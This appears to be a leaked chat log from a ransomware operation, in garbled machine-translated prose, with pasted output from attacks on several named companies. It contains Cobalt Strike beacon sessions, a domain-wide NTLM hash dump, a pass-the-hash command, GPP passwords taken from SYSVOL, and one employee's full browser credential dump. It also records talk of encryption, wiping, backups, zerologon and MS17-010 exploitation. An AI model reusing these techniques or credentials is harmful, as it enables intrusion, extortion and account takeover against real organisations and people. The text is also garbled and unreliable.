 632 540 services.exe x64 0 NT AUTHORITY\SYSTEM
 536 632 svchost.exe x64 0 NT AUTHORITY/NETWORK SERVICE
 708 632 svchost.exe x64 0 NT AUTHORITY\SYSTEM
 2432 708 WmiPrvSE.exe x64 0 NT AUTHORITY/\NETWORK SERVICE
 3004 708 WmiPrvSE.exe x64 0 NT AUTHORITY/NETWORK SERVICE
 37844 3004 cmd.exe x64 0 SKYTECH1\skyadmin
 36296 37844 conhost.exe x64 0 SKYTECH1\skyadmin
 38408 37844 DiskShare.exe x64 0 SKYTECH1\skyadmin
 38464 38408 icacls.exe x64 0 SKYTECH1\skyadmin
 38296 38464 conhost.exe x64 0 SKYTECH1\skyadmin
 38740 38408 icacls.exe x64 0 SKYTECH1\skyadmin
 35536 38740 conhost.exe x64 0 SKYTECH1\skyadmin
 41780 3004 rundll32.exe x64 0 SKYTECH1\skyadmin
 3044 708 WmiPrvSE.exe x64 0 NT AUTHORITY\SYSTEM
 4528 708 PrintIsolationHost.exe x64 0 NT AUTHORITY\SYSTEM
 166428 708 WmiPrvSE.exe x86 0 NT AUTHORITY\NETWORK SERVICE
 184248 708 WmiPrvSE.exe x86 0 NT AUTHORITY/\SYSTEM
 185016 708 WmiPrvSE.exe x86 0 NT AUTHORITY\LOCAL SERVICE
 186124 708 WmiPrvSE.exe x64 0 NT AUTHORITY\LOCAL SERVICE
 756 632 svchost.exe x64 0 NT AUTHORITY/NETWORK SERVICE
 908 632 svchost.exe x64 0 NT AUTHORITY/LOCAL SERVICE
 944 632 svchost.exe x64 0 NT AUTHORITY\SYSTEM
 5432 944 taskhostex.exe x64 2 SKYTECH1\skyadmin
 1004 632 svchost.exe x64 0 NT AUTHORITY/LOCAL SERVICE
 1096 632 svchost.exe x64 0 NT AUTHORITY/LOCAL SERVICE
 1196 632 vmtoolsd.exe x64 0 NT AUTHORITY/ LOCAL SERVICE
 1308 632 spoolsv.exe x64 0 NT AUTHORITY\SYSTEM
 1408 632 armsvc.exe x86 0 NT AUTHORITY\SYSTEM
 1428 632 svchost.exe x64 0 NT AUTHORITY\SYSTEM
 1448 632 svchost.exe x64 0 NT AUTHORITY\SYSTEM
 1508 1448 dasHost.exe x64 0 NT AUTHORITY\LOCAL SERVICE
 1492 632 g2ax_service.exe x86 0 NT AUTHORITY\SYSTEM
 1676 1492 g2ax_comm_customer.exe x86 0 NT AUTHORITY\SYSTEM
 1084 1676 g2ax_system_customer.exe x86 0 NT AUTHORITY\SYSTEM
 6868 1676 g2ax_user_customer.exe x86 2 SKYTECH1\skyadmin
 1792 632 mqsvc.exe x64 0 NT AUTHORITY\NETWORK SERVICE
 1892 632 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE
 1940 632 SMSvcHost.exe x64 0 NT AUTHORITY\LOCAL SERVICE
 2124 632 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE
 2448 632 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE
 2552 632 SMSvcHost.exe x64 0 NT AUTHORITY\NETWORK SERVICE
 4048 632 svchost.exe x64 0 NT AUTHORITY/NETWORK SERVICE
 4088 632 svchost.exe x64 0 NT AUTHORITY/NETWORK SERVICE
 4744 632 msdtc.exe x64 0 NT AUTHORITY/NETWORK SERVICE
 9364 632 ramaint.exe x64 0 NT AUTHORITY\SYSTEM
 9400 632 LMIGuardianSvc.exe x64 0 NT AUTHORITY\SYSTEM
 48576 632 Ntrtscan.exe x64 0 NT AUTHORITY\SYSTEM
 48728 632 svcGenericHost.exe x86 0 NT AUTHORITY\SYSTEM
 47672 48728 HostedAgent.exe x86 0 NT AUTHORITY\SYSTEM
 48920 47672 logWriter.exe x86 0 NT AUTHORITY\SYSTEM
 49184 48920 conhost.exe x64 0 NT AUTHORITY\SYSTEM
 48964 47672 conhost.exe x64 0 NT AUTHORITY\SYSTEM
 49680 48728 TMCPMAdapter.exe x86 0 NT AUTHORITY\SYSTEM
 49544 49680 conhost.exe x64 0 NT AUTHORITY\SYSTEM
 *49128 632 TmListen.exe x64 0 NT AUTHORITY\SYSTEM
 49240 632 TMBMSRV.exe x64 0 NT AUTHORITY\SYSTEM
 49976 632 TmCCSF.exe x64 0 NT AUTHORITY\SYSTEM
 57936 49976 TmsaInstance64.exe x64 0 NT AUTHORITY\SYSTEM
 53368 57936 conhost.exe x64 0 NT AUTHORITY\SYSTEM
 142872 632 LogMeIn.exe x64 0 NT AUTHORITY\SYSTEM
 176516 632 TrustedInstaller.exe x64 0 NT AUTHORITY\SYSTEM
 184868 632 WmiApSrv.exe x64 0 NT AUTHORITY\SYSTEM
 640 540 lsass.exe x64 0 NT AUTHORITY\SYSTEM
 4228 8148 zscccon64.exe x64 0 NT AUTHORITY\SYSTEM
 8988 4228 conhost.exe x64 0 NT AUTHORITY\SYSTEM
 4364 1720 winlogon.exe x64 2 NT AUTHORITY\SYSTEM
 3228 4364 dwm.exe x64 2 Window Manager\DWM-2
 160248 4364 logonUI.exe x64 2 NT AUTHORITY\SYSTEM
 4448 7868 conhost.exe x64 0 SKYTECH1\bbesadmin
 4796 1720 csrss.exe x64 2 NT AUTHORITY\SYSTEM
 6840 7056 jusched.exe x86 2 SKYTECH1\skyadmin
 1044 6840 jucheck.exe x86 2 SKYTECH1\skyadmin
 6924 9964 GoogleCrashHandler.exe x86 0 NT AUTHORITY\SYSTEM
 8620 5452 explorer.exe x64 2 SKYTECH1\skyadmin
 5856 8620 vmtoolsd.exe x64 2 SKYTECH1\skyadmin
 142068 8620 LogMeInSystray.exe x64 2 SKYTECH1\skyadmin
 9340 9964 GoogleCrashHandler64.exe x64 0 NT AUTHORITY\SYSTEM
 10152 7868 schtasks.exe x64 0 SKYTECH1\bbesadmin
 49532 49328 PccNtMon.exe x64 2 SKYTECH1\skyadmin
 184316 180296 platform-installation-manager.exe x86 0 NT AUTHORITY\SYSTEM
 220380 220652 powershell.exe x64 0 NT AUTHORITY\SYSTEM
 217240 220380 conhost.exe x64 0 NT AUTHORITY\SYSTEM
 220744 220380 powershell.exe x86 0 NT AUTHORITY\SYSTEM
 219488 220744 conhost.exe x64 0 NT AUTHORITY\SYSTEM
``I don't see what's in the processes except for avera, is it just on the population or nowhere at all?
```
01/29/2021 08:42 PM 536 ARCAOS.txt.HAWFH
i don't think so, i don't think so, i don't think so, i don't think so, i don't think so, i don't think so, i don't think so, i don't think so, i don't think so, but the file udmi does not show up)
but there are extensions who will stay7 on Mon by 5 the rest go home1 on duty a lot are already encrypted on the nasa?
the wiped is still being tossed with terabytes of files all passed?
did the other prima linas pass?
Servers:
    - hell: 39
    - alive: 15
    - drawn: 15
    - coded: 15

Armies:
    - by hell: 184
    - alive: 48
    - encrypted: 48 (primaed)

all disks unshared, processes nailed down
``````
10.0.6.54:445 (platform: 500 version: 6.1 name: SKYNASJEN domain: WORKGROUP) NAS admin/password FS visible from YES
10.0.6.83:445 (platform: 500 version: 4.9 name: LS520DC5F domain: WORKGROUP) nas
10.0.6.153:445 (platform: 500 version: 4.9 name: SKYNASDMW domain: SKYTECH1) nas
10.0.2.127:445 (platform: 500 version: 6.1 name: SKYNASSC domain: VOLUME) nas

``````
 pth skytech1.local\BESAdmin b7e996a9282b045b181ab26ba27f6242
``````
10.0.2.130
10.0.6.9
10.0.6.27
10.0.2.7
10.0.6.51
10.0.6.13
````S(FJH*G&*SDifgtsidgtis7g ?600 then in slipslip so it's already in nemya in winlogon dk I always throw in slipslip just open winlogon how many? on one, get it then on dk) all in group dk[ ](https://mediaeveryone.com/group/gaudyme-com?msg=rmMqhDAK6JhpvFHc7) 1 and in slipslip sessions on a couple of servers fuck them
beacon> shell ping gaudyme.com
[*] Tasked beacon to run: ping gaudyme.com
[+] host called home, sent: 47 bytes
[+] received output:

Pinging gaudyme.com [72.52.147.20] with 32 bytes of data:
Reply from 72.52.147.20: bytes=32 time=85ms TTL=55
Reply from 72.52.147.20: bytes=32 time=84ms TTL=55
Reply from 72.52.147.20: bytes=32 time=84ms TTL=55
Reply from 72.52.147.20: bytes=32 time=85ms TTL=55

Ping statistics for 72.52.147.20:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 84ms, Maximum = 85ms, Average = 84ms

beacon> portscan 72.52.147.20 1-30,135,139,443,445
[*] Tasked beacon to scan ports 1-30,135,139,443,445 on 72.52.147.20
[+] host called home, sent: 93285 bytes
[+] received output:
(ICMP) Target '72.52.147.20' is alive. [read 8 bytes]
72.52.147.20:443
72.52.147.20:26
72.52.147.20:21 (220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------)

[+] received output:
72.52.147.20:25

[+] received output:
Scanner module is complete
``Simply there seems to be users and real domain realproscan 3 servers, one destination unreachable, the other redirects to the current dk whyomu 90% you have not labana 1-30,135,139,443, as we fucked the brain and not laba lilaba can take an existing domain of some companybut you can not go directly to this domain you know they sell clothes in insta and facebook have pages so we are talking about this) and that's not to say that laba that does not look like laba I just say there quarantine mostly look wilsonart 30 trusts?https://shopthegaudy.com/ну however? there are about 30 trusts there but the neighboring one is definitely not a labaSo you know how we know how to shine the inventory for analytics labs?)yes let's close it)yes I also think it looks like a laba again...3 servers let's close it no trusts throw it on the server far away
```
32 Objects returned
``I'll give you dllkrasawa,``
[DC] 'DressinGaudy.local' will be the domain
[DC] 'Gaudy-DC2.DressinGaudy.local' will be the DC server
[DC] Exporting domain 'DressinGaudy.local'
1185 GAUDY-RDP1$ c4c6b3a3fa322dfb74dfb692fffb1aa54c7 532480
1119 SOCIAL-MEDIIA1$ 5f3854e8bd9d3aa5f68cb807b7891c22 4096
1114 BRITTANI-PC$ 5d8a95512df9e719207a0ed7686c417e 4096
1118 SOCIAL-MEDIA1$ cc9f2f930553c8516b2fc61f37f04910 4096
1107 CORPORATE-LAPTO$ 8bd91dcc12602c157f58b5d43b00d4ef 4096
1177 canon 8ef62adbb9127aa5cb4ddc8ceb483994 66048
1186 CORPORATE-DESKT$ 05a2b95c896aa1e365a78493f97036c0 4096
1110 QBDataServiceUser24 5c275327b45004dbb777866feacb7c44 66048
1237 QBDataServiceUser27 7e62fb7999eb74ee272401b607f1f110 66048
1147 DGLONGVIEW-PC$ e52b1d43fb366fe99fcc638a4730103b 4096
1606 GCPOS5A-LGM3 d29b9f741a059cde7e9ddfed5701ced7 66050
1605 GCPOS4A-LGM2 d29b9f741a059cde7e9ddfed5701ced7 66050
1604 GCPOS3A-LGM1 d29b9f741a059cde7e9ddfed5701ced7 66050
1234 GCPOS17A-LDG1 d29b9f741a059cde7e9ddfed5701ced7 66050
1235 GCPOS18A-LDG2 d29b9f741a059cde7e9ddfed5701ced7 66050
1610 GCPOS10A-TGM3 d29b9f741a059cde7e9ddfed5701ced7 66050
1611 GCPOS11A-CDG1 d29b9f741a059cde7e9ddfed5701ced7 66050
1612 GCPOS12A-CDG2 d29b9f741a059cde7e9ddfed5701ced7 66050
1613 GCPOS13A-CDG3 d29b9f741a059cde7e9ddfed5701ced7 66050
1601 GCPOS1A-TDG1 d29b9f741a059cde7e9ddfed5701ced7 66050
1603 GCPOS2A-TDG2 d29b9f741a059cde7e9ddfed5701ced7 66050
1607 GCPOS6A-TXDG1 d29b9f741a059cde7e9ddfed5701ced7 66050
1608 GCPOS7A-TXDG2 d29b9f741a059cde7e9ddfed5701ced7 66050
1609 GCPOS8A-TGM1 64f12cddaa88057e06a81b54e73b949b 66050
1602 GCPOS9A-TGM2 d29b9f741a059cde7e9ddfed5701ced7 66050
1210 allisonp 47b178d121cd3bab2192988418dfc888 66050
1175 canton 399f140089c0e3d11c7b8267d11eb011 66048
1217 social 48ae08e40717fc5d1075610f5a6d14f0 66048
1220 order 64ad7b9e2614ff9b9082025ff12976fe 66050
1229 sabrinah 48ae08e40717fc5d1075610f5a6d14f0 66050
502 krbtgt 231b0468e1c72213ef935e8cb4b4906f 514
1113 QBPOSDBSrvUser 90d145e86ae9f78a6e61d1fec6cfbb5f 66048
1214 ROOK 0d1d3a9a35ad2c91b12b9e0a9a9a83e169 66050
1219 Shopthegaudysite 64ad7b9e2614ff9b9082025ff12976fe 66050
1197 receiving2 3be8bfea417bb754d098159f04dbc239 66050
1244 VMPro d5d2270b5b056635450ab6139ff44db9 66048
1222 Careers 64ad7b9e2614ff9b9082025ff12976fe 66048
1221 admin 64ad7b9e2614ff9b9082025ff12976fe 66048
1146 jpu c6e4af5358661caf7a1e5d5a1d7f771b 66048
1241 gaudy 72bb5d55d77daf7721d92f80974a716d4 66048
1161 ncp fe64f8d8957e7236a923810afc8002c4 66048
1188 Info 41c3a27426f8b504ddcdc54dbf9ac6e3 66048
1215 sales 64ad7b9e2614ff9b9082025ff12976fe 66048
1223 orders ec659a6bff5d09327e805a2faf06fc94 66048
1239 orders 64f12cddaa88057e06a81b54e73b949b 66048
1157 hbt bbd870afdcc36d200a739c193eed5e6d 66048
1216 CustomerService ec659a6bff5d09327e805a2faf06fc94 66048
1159 klm b1677919e2aa45ba57959305e76a5946 66048
2105 grantp fdb219f9e944f46ef3aeec0686917e86 66048
503 DefaultAccount 31d6cfe0d16ae931b73c59d7e0c089c0 514
1195 SOCIALMEDIA1$ c83ce529704a20e431c48e000caaf0cb 4096
1168 SOCIALMEDIA3$ dfd33f42d4cfe4263069b1520ab2d898 4096
1616 MIKALAPTOP$ dc8b3717fe624123307cc1cea924b7b6 4096
1238 CORPORATE2$ e842adcc65fb28f339df23841037da51 4096
1236 madisonc 989a6a62caf5177d82ae02ba3c9c0eb0 66050
1192 GM103 ff6baa1584e0f920a1224947ee436067 66048
1108 emm 9ef20ca8484efe69a7197730a9b8badc 66048
1231 LeahP b080b686db8076775a51272b8a07f419 66050
2117 cooperm 81cd9c07ca5bdc15ed2dde1d45cccef7 66048
1242 QBDataServiceUser28 f9afe04ed33db257f4f6e4a126aa6003 66048
2118 QBDataServiceUser29 560e002747f32bf8dc26005978fefa3e 66048
1240 kaylab 285da02342607559528b49ae60d909b3 66048
1233 DG108 ece4a880865e765d57733539931b334b 66048
1191 GM106 3ea7b213b7e25cc0cce68803303952b5 66048
1155 bdc 872d591814c3eb168a120d4067888885 66048
1619 GCPOS16A$ 9997926294c6ee5932a5ebd94f0f8355 4096
1218 Breer efa36a734a1aba14b95bcd0f9ceb1610 66048
1194 MeaganC 662ce6b8aa70d5ed8f96b25d98c3743b 66048
1000 GAUDY-DC1$ 02fab4f0918492e698ae8b519a992fa7 4096
2106 SOCIAL3$ 517ab1040e57c71cdd9eb021318335e2 4096
1106 jmr 554193c8030f36f98504a0fdfb63b3ba 66048
1224 DG-TYLER-OFFICE$ 147e9e3fd70aa5f9fe99c9880199e543 4096
2114 socialmedia3 d14687e5eebe9af70f2e30d49f4759ea 66048
1227 GCPOS15A$ 4f87b85d2fb489f3f4cd927d51d85d06 4096
1190 DG102 2c5c4e9f4ba709322f13f7df92619dd6 66048
1226 GCPOS14A$ 774454456817213d7882483d4eb3f910 4096
1620 POS14 64f12cddaa88057e06a81b54e73b949b 66048
2115 MackenziD 87c7bec5244e04ff5286b332f7a534dd 66048
1621 pos15 64f12cddaa88057e06a81b54e73b949b 66048
1622 POS16 64f12cddaa88057e06a81b54e73b949b 66048
1109 JENIRAMSEY-PC$ 837dadb16d5fbe52eeb431e871bbfd6a 4096
1193 DG105 a733b31bc8855948eef5217fb77e6837 66048
2121 kimw 8908a802d83a41c2178c47dbb53cf1c1 66048
1163 texarkana a733b31bc8855948eef5217fb77e6837 66048
1618 DG-TEX-OFFICE$ 878b13be8f93134e0f115ee09d0dfdd8 4096
2120 larkinp 8837daf55148dcc8352a67b761c37e8e 66048
1617 SHIPPING$ 02c10a5073b82fe6782582a3ddea72f8 4096
1245 OWNER-PC$ 70cad180b2e3f00380211e955197dd43 4096
1230 DGLongview ece4a880865e765d57733539931b334b 66048
1160 longview ff6baa1584e0f920a1224947ee604367 66048
1170 corporate 91631b2dba583d2133168dcefa82bc63 66048
1614 CORPORATE$ 6927c73ce468477e647563063937f2b4 4096
2113 clittleton 5f2f93f575aef31552177a4e70b4980e 66048
1202 sharies 866f661b57f5f233e10fdd1569980c44 66048
2125 meganl 5965d4ddc4bde0f6fcb32fb07a1a625b 66048
2122 teresac 78b5fb4330f3807604e449a52af8b5ad 66050
2108 SOCIAL2$ 5cc5391f1c26ff59544b474f47ef0477 4096
1199 receiving 81cd9c07ca5bdc15ed2dde1d45cccef7 66048
1165 socialmedia1 933062fa0aee8303a48f070887208732 66048
2107 SOCIAL1$ 47a04b5e303b009aa595cd47f47eb7ab 4096
2109 Katelync 9647b5f0f1136f99333939a3373f0899 66048
1148 tim 0746a084694c267c15fe9c1081b05cf9 66048
2119 magenl 5965d4ddc4bde0f6fcb32fb07a1a625b 66048
1153 dg 2c5c4e9f4ba709322f13f7df92619dd6 66048
1228 website 0bd318c29d9542e09abbee52463a46fb 66048
2111 Rockwall a3498136f2eb7322d7589605346386c5 66048
1164 tyler 3ea7b213b7e25cc0cce68803303952b5 66048
1123 MIKADESKTOP$ c88b197b373b29b943459015891e4abf 4096
500 Administrator 2bebaecfce9530051a337ca7a299c71c 512
2126 QBDataServiceUser31 894d6d5d1a0478e345d2e6f07cfdd779 66048
2123 cindyh e2e9a2a7db389a08cfbfc8be07d6d989 66048
1122 LABEL$ 977f7a1eb84ea5a15d5ec435cd40bfc9 4096
2112 ROCKWALL-BACKOF$ edb60636f3d2fc8581decf3a360ccb2f 4096
1207 Label 873e50fd637d0d3ded9af361d32d8d62 66048
1623 DGW-PC$ 48be5acefeae8f107cd967f647f7af01 4096
1117 ACCOUNTING2$ 5995fd09c96b540bd3e440793c22fc50 4096
1615 RECEIVING$ 6f54a61c7fa05beb879ddb0ced50b071 4096
1225 GM-TYLER-OFFICE$ 8be51ee606ede11119acaf3731071326 4096
1121 socialmedia2 60cafefefc6658a34bc7032d29f7614032 66048
1145 dat 5e481f285545336512794748d10e16b9 66048
1243 GAUDY-DC2$ f57e713d19f3c2f5e24627014549951e 532480
2124 destineeg bd3d4fbd9e1f03c50106eeee4b54823c 66048

``SharpShares didn't give out the balloon, let ShareFinderkerbs no)``I just noticed and let's drop them in the processkerbs? shufflefinder? no elevate has worked outthe current username domain userbut here domain users are LA``.
The request will be processed at a domain controller for domain DressinGaudy.local.

Group name Domain Admins
Comment Designated administrators of the domain

Members

-------------------------------------------------------------------------------
Administrator bdc canton
corporate DG102 DG105
DG108 GCPOS10A-TGM3 GCPOS11A-CDG1
GCPOS12A-CDG2 GCPOS13A-CDG3 GCPOS17A-LDG1
GCPOS18A-LDG2 GCPOS1A-TDG1 GCPOS2A-TDG2
GCPOS3A-LGM1 GCPOS4A-LGM2 GCPOS5A-LGM3
GCPOS6A-TXDG1 GCPOS7A-TXDG2 GCPOS8A-TGM1
GCPOS9A-TGM2 GM103 GM106
jmr katelync kimw
ROOK tim
The command completed successfully.
```
```
The request will be processed at a domain controller for domain DressinGaudy.local.

Group name Enterprise Admins
Comment Designated administrators of the enterprise

Members

-------------------------------------------------------------------------------
Administrator
The command completed successfully.
```
```
Alias name administrators
Comment Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
DGW-PC
DRESSINGAUDY\Domain Admins
DRESSINGAUDY\Domain Users
The command completed successfully.
ah, ok I respawn in the input there is yes it in the cob it falls off mineI will restart then don't refresh it overall not criticalrequest ad_ous or ad_group - session falls offtoday they will be newnot gonna waste more time ok, fuck it, maybe they have off-line backups or something backups server is not open 10 servers checked
there's no note, i'll help you in STAKC. i still have everything patched (tell @user3 and @user9 they did a good jobIf you want to use zerologon, what tactic/sequence of action would you advise?I'm just not that familiar with openssl, so I thought maybe you've caught a similar thing before and know how to fix it...As I understand it, a bug in Ubuntu seems to be the same error? `proxychains python3 RDGScanner.py 172.31.190.10 3391 `proxychains python3 rdg_scanner_cve-2020-0609.py 172.31.190.10 `proxychains python3 BlueGate.py 172.31.190.10 -M check
`How do you run it and what do you run?
```
df734@vps:~$ pip3 freeze
certifi==2019.11.28
cffi==1.14.3
chardet==3.0.4
cryptography==2.8
idna==2.8
netaddr==0.8.0
pycparser==2.20
pyOpenSSL==19.0.0
requests==2.22.0
six==1.14.0
urllib3==1.25.8

``https://www.pyopenssl.org/en/stable/install.html``python3-openssl is already the newest version (19.0.0-1build1).````
 sudo apt install pyOpenSSL
Reading package lists... Done
Building dependency tree
Reading state information... Done
E: Unable to locate package pyOpenSSL

Did you install this? And the error is the same everywhere in the same place.
```
[system_default_sect]
MinProtocol = SSLv3
CipherString = DEFAULT@SECLEVEL=1
Which one? https://github.com/ollypwn/BlueGate
https://github.com/MalwareTech/RDGScanner
https://github.com/2d4d/rdg_scanner_cve-2020-0609дай link to the script used[ ](https://mediaeveryone.com/group/snpartners-com?msg=oEWxKNC4EvZLQwGSm) no, didn't use ``.
Traceback (most recent call last):
  File "BlueGate.py", line 130, in <module>
    connection = Connection(args.host, args.port)
  File "BlueGate.py", line 68, in __init__
    self.connect()
  File "BlueGate.py", line 84, in connect
    self.connection.do_handshake()
  File "/usr/lib/python3/dist-packages/OpenSSL/SSL.py", line 1915, in do_handshake
    self._raise_ssl_error(self._ssl, result)
  File "/usr/lib/python3/dist-packages/OpenSSL/SSL.py", line 1647, in _raise_ssl_error
    _raise_current_error()
  File "/usr/lib/python3/dist-packages/OpenSSL/_util.py", line 54, in exception_from_error_queue
    raise exception_type(errors)
OpenSSL.SSL.Error: [('SSL routines', 'state_machine', 'internal error')]
df734@vps:~$

``@tl1 Did you use CVE-2020-0609 yourself? Catching ssl errors. How to fix it?
Windows Remote Desktop Gateway (RD Gateway) Remote Code Execution Vulnerability
Is it bleedingghost which? Okay, look at itSVE-2020-0609 there is no way out from here. What's wrong with it?
i will try zerologon not one of them is not pinged i will check you have them available? yes trusts hell? take it off and throw it here by the way i understand you did not take off hell so you can from the current domain through trust take off the kerbs other domains.... like adna trust domains? there - where? how do i go there? i have an idea, no. have you removed kerbs from trusts? there are 4 in the file. two in quarantinetraistov no?[ ](https://mediaeveryone.com/group/snpartners-com?msg=MqT5FqXhoeR4zLLdw) well there are more and not sure?I will try zerologon.com tomorrow. Tomorrow I will try to zerologon start - no more options left...
beacon> portscan 172.31.190.47 80,443,25,110,995,143,993,465 icmp 10
[*] Tasked beacon to scan ports 80,443,25,110,995,143,993,465 on 172.31.190.47
[+] host called home, sent: 93245 bytes
[+] received output:

[+] received output:
Scanner module is complete
``Check the web ports and the ports of the mail service, for example''.
>operatingSystem: Windows Server 2003
>operatingSystemVersion: 5.2 (3790)
>operatingSystemServicePack: Service Pack 2
>dNSHostName: DETADP01.gpj.loc
on specific hosts operating systems which you have in your AD, are they even registered if they are empty - then the rest of the domain can already be scanned if there is "empty" then sevens and 2008pod ms17-010 first choose XP / 2003 machine terrible selection criteria))) this will be most effective given that the other main paths we have tried) I propose to ping all live hosts in the domain
and ALL go to this splot already with the creeds of the domain user to see if it is not connected to the IPC$ tree does not only need to include verbose and on what principle were these hosts selected? so here like nothing has scanned ... no answers, no .... and what was the output, if i could see which ones you randomly scanned? just because we have domain-creds - with them it is better "start" on some axes above 7 were not in the domain machines vulnerable to this exploit? and what about 17-010 at the end? yes at the end we only have her pass - but it does not roll anywhere as an administrator, right?
[+] received output:
[+] Success! Username: SBolley. Password: thisduckingsucks!
[*] Completed.
What's the error?
ERROR: FindOne : Exception calling "FindOne" with "0" argument(s): "The server is not operational.
ERROR: "
ERROR:
ERROR: At line:145 char:36
ERROR: + $user = $search.FindOne <<<< ()
ERROR: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException
ERROR: + FullyQualifiedErrorId : DotNetMethodException
ERROR:
ERROR: user : The variable '$user' cannot be retrieved because it has not been set.
ERROR:
ERROR: At line:146 char:22
ERROR: + if ($user <<<< -ne $null)
ERROR: + CategoryInfo : InvalidOperation: (user:Token) [], RuntimeException
ERROR: + FullyQualifiedErrorId : VariableIsUndefined

``interesting''
[+] received output:
Parsing file: \\GPJ.LOC\sysvol\GPJ.LOC\policies\{20FA66DA-01F3-493D-A72B-23C077395633}\Machine\Preferences\Groups\Groups.xml
[RESULT] Username: Administrator (built-in)
[RESULT] Changed: 2015-06-29 09:18:32
[RESULT] Password: DdhGmek/pc
[RESULT] Username: install
[RESULT] Changed: 2015-06-29 09:46:46
[RESULT] Password: rt/98740/pc
[RESULT] Username: Lack
[RESULT] Changed: 2014-10-06 09:45:54
[RESULT] Password: RT+farbe

``17-010 checked? Gentlemen, how is it with the yuac bypass? still no yuac bypassed? Better let it be like this
```
Group name Domain Admins
Comment Designated administrators of the domain

Members

-------------------------------------------------------------------------------
ADAXES AMoultonADM bigfix
ELittleADM JStriberADM pwwDirAdmin
TMunsonADM

``Lest we forget, I wrote in #generalwhy don't you take everything off at once as a list? 2 times it reminds me
#local admin
Alias name Administrators
Comment Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
GPJ\SBolley
GPJHelp
The command completed successfully.

``local admins and enterprice?
--- Chromium Credential (User: SBolley) ---
URL : https://www.facebook.com/login.php
Username : simon.r.bolley@gmail.com
Password : spiderman!23

--- Chromium Credential (User: SBolley) ---
URL : https://ol.miniusa.com/Shared/Home/LoginPost
Username : srbolley
Password : Canada23

--- Chromium Credential (User: SBolley) ---
URL : https://gxstradeweb.gxsolc.com/pub-log/login.pl
Username : gpjohnson
Password : password

--- Chromium Credential (User: SBolley) ---
URL : https://care.siriusxm.com/login_execute.action
Username : simon.r.bolley@gmail.com
Password : Canada!23

--- Chromium Credential (User: SBolley) ---
URL : https://www.amazon.com/ap/signin
Username : simon.r.bolley@gmail.com
Password : Canada!23

--- Chromium Credential (User: SBolley) ---
URL : https://sts.gpj.com/adfs/ls/
Username : simon.bolley@gpj.com
Password : thisduckingsucks!02

--- Chromium Credential (User: SBolley) ---
URL : https://jdepd.project.com/jde/E1Menu.maf
Username : sbolley
Password : Canada!75

--- Chromium Credential (User: SBolley) ---
URL : https://login.xfinity.com/login
Username : bolley2244
Password : canada!23

--- Chromium Credential (User: SBolley) ---
URL : https://secure2.homedepot.com/account/view
Username : simon.r.bolley@gmail.com
Password : spiderman23

--- Chromium Credential (User: SBolley) ---
URL : https://app.smartsheet.com/b/home
Username : simon.bolley@gpj.com
Password : Canada!64

--- Chromium Credential (User: SBolley) ---
URL :
Username : sbolley
Password : thisduckingsucks!01

--- Chromium Credential (User: SBolley) ---
URL : https://www.delta.com/
Username : 9015769087
Password : Getmeoutofhere!23

--- Chromium Credential (User: SBolley) ---
URL : https://account.activedirectory.windowsazure.com/passwordreset/register.aspx
Username : In what city does your nearest sibling live?
Password : *************

--- Chromium Credential (User: SBolley) ---
URL : https://passwordreset.microsoftonline.com/
Username : simon.bolley@gpj.com
Password : thisduckingsucks!02

--- Chromium Credential (User: SBolley) ---
URL : https://accounts.google.com/signin/challenge/sl/password
Username : simon.bolley@gpj.com
Password : thisduckingsucks!02

--- Chromium Credential (User: SBolley) ---
URL : https://login.microsoftonline.com/8eaa3b9e-ddf5-409e-87bf-df1edbbeaf70/login
Username : simon.bolley@gpj.com
Password : thisduckingsucks!02

--- Chromium Credential (User: SBolley) ---
URL : https://accounts.uber.com/forgot-password/
Username : simon.bolley@gpj.com
Password : getmeouttahere!23

--- Chromium Credential (User: SBolley) ---
URL : https://auth.uber.com/login/session
Username : simon.bolley@gpj.com
Password : getmeouttahere!23

--- Chromium Credential (User: SBolley) ---
URL : https://account.activedirectory.windowsazure.com/passwordreset/register.aspx
Username : Simon.r.bolley@gmail.com
Password : *************

--- Chromium Credential (User: SBolley) ---
URL : https://player.siriusxm.com/
Username : simon.r.bolley@gmail.com
Password : Canada!23

--- Chromium Credential (User: SBolley) ---
URL : https://www.homedepot.com/auth/view/signin
Username : simon.r.bolley@gmail.com
Password : spiderman23

--- Chromium Credential (User: SBolley) ---
URL : https://member.bcbsm.com/mpa/accountRecoverySelfService/accountRecoveryOptions
Username : sbolley
Password : Spiderman23

--- Chromium Credential (User: SBolley) ---
URL : https://member.bcbsm.com/mpa/responsive/
Username : sbolley
Password : Spiderman23

--- Chromium Credential (User: SBolley) ---
URL : https://madisonheights.greenlanternpizza.com/ordering/
Username : simon.r.bolley@gmail.com
Password : thursdaynight!23

--- Chromium Credential (User: SBolley) ---
URL : https://www.cbssports.com/login
Username : simon.r.bolley@gmail.com
Password : spiderman23

--- Chromium Credential (User: SBolley) ---
URL :
Username : simon.r.bolley@gmail.com
Password : lovemymini!23

--- Chromium Credential (User: SBolley) ---
URL : https://care.siriusxm.com/updateinternetcredentials_execute.action
Username : simonsminicooper
Password : ilovemymini!23

--- Chromium Credential (User: SBolley) ---
URL : https://player.siriusxm.com/
Username : simonsminicooper
Password : ilovemymini!23

--- Chromium Credential (User: SBolley) ---
URL : https://newlook.dteenergy.com/wps/wcm/connect/dte-web/login
Username : simon.r.bolley@gmail.com
Password : spiderman23

--- Chromium Credential (User: SBolley) ---
URL : https://milogin.michigan.gov/eai/login/authenticate
Username : srbolley@71
Password : ThisSucksGPJ!97

--- Chromium Credential (User: SBolley) ---
URL : https://app.naviabenefits.com/app/
Username : srbolley
Password : 2020Sucks

``This is easier than that.
beacon> net domain_controllers
[*] Tasked beacon to run net domain_controllers
[+] host called home, sent: 104518 bytes
[+] received output:
Domain Controllers:

 Server Name IP Address
 ----------- ----------

[+] received output:
 DETMSDC01 192.168.11.42
 LAXMSDC01 192.168.30.42
 BNGMSDC01 192.168.110.42
 SFOMSDC01 10.200.132.52
 DETMSDC02 192.168.11.43
 TOKMSDC01 192.168.90.6
 SHARMSDC01 10.220.136.40
 SYDMSDC01 192.168.101.42
 SNGMSDC01 192.168.241.42
 NYCMSDC01 10.201.36.42
 AUSMSDC01 192.168.221.42
 SFOAMSDC01 10.200.164.42
